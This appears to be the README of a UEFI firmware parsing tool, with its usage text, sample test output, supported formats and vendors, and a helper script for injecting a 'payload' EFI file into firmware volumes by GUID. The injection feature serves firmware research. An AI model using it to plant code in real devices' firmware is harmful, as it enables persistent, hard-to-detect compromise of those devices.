                            file [file ...]

Parse, and optionally output, details and data on UEFI-related firmware.

positional arguments:
  file                  The file(s) to work on

optional arguments:
  -h, --help            show this help message and exit
  -b, --brute           The input is a blob and may contain FV headers.
  --superbrute          The input is a blob and may contain any sort of
                        firmware object
  -q, --quiet           Do not show info.
  -o OUTPUT, --output OUTPUT
                        Dump firmware objects to this folder.
  -O, --outputfolder    Dump firmware objects to a folder based on filename
                        ${FILENAME}_output/
  -c, --echo            Echo the filename before parsing or extracting.
  -e, --extract         Extract all files/sections/volumes.
  -g GENERATE, --generate GENERATE
                        Generate a FDF, implies extraction (volumes only)
  --test                Test file parsing, output name/success.

$ uefi-firmware-parser --test ~/firmware/*
~/firmware/970E32_1.40: UEFIFirmwareVolume
~/firmware/CO5975P.BIO: EFICapsule
~/firmware/me-03.obj: IntelME
~/firmware/O990-A03.exe: None
~/firmware/O990-A03.exe.hdr: DellPFS

$ uefi-firmware-parser --test ~/firmware/970E32_1.40
~/firmware/970E32_1.40: unknown
$ uefi-firmware-parser --superbrute ~/firmware/970E32_1.40
[...]

• UEFI Firmware Volumes, Capsules, FileSystems, Files, Sections parsing
• Intel PCH Flash Descriptors
• Intel ME modules parsing (ME, TXE, etc)
• Dell PFS (HDR) updates parsing
• Tiano/EFI, and native LZMA (7z) [de]compression
• Complete UEFI Firmware volume object hierarchy display
• Firmware descriptor [re]generation using the parsed input volumes
• Firmware File Section injection

$ python ./scripts/fv_injector.py -h
usage: fv_injector.py [-h] [-c] [-p] [-f] [--guid GUID] --injection INJECTION
                      [-o OUTPUT]
                      file

Search a file for UEFI firmware volumes, parse and output.

positional arguments:
  file                  The file to work on

optional arguments:
  -h, --help            show this help message and exit
  -c, --capsule         The input file is a firmware capsule.
  -p, --pfs             The input file is a Dell PFS.
  -f, --ff              Inject payload into firmware file.
  --guid GUID           GUID to replace (inject).
  --injection INJECTION
                        Pre-generated EFI file to inject.
  -o OUTPUT, --output OUTPUT
                        Name of the output file.

$ python ./scripts/uefi_guids.py -h
usage: uefi_guids.py [-h] [-c] [-b] [-d] [-g GENERATE] [-u] file

Output GUIDs for files, optionally write GUID structure file.

positional arguments:
  file                  The file to work on

optional arguments:
  -h, --help            show this help message and exit
  -c, --capsule         The input file is a firmware capsule, do not search.
  -b, --brute           The input file is a blob, search for firmware volume
                        headers.
  -d, --flash           The input file is a flash descriptor.
  -g GENERATE, --generate GENERATE
                        Generate a behemoth-style GUID output.
  -u, --unknowns        When generating also print unknowns.

• ASRock
• Dell
• Gigabyte
• Intel
• Lenovo
• HP
• MSI
• VMware
• Apple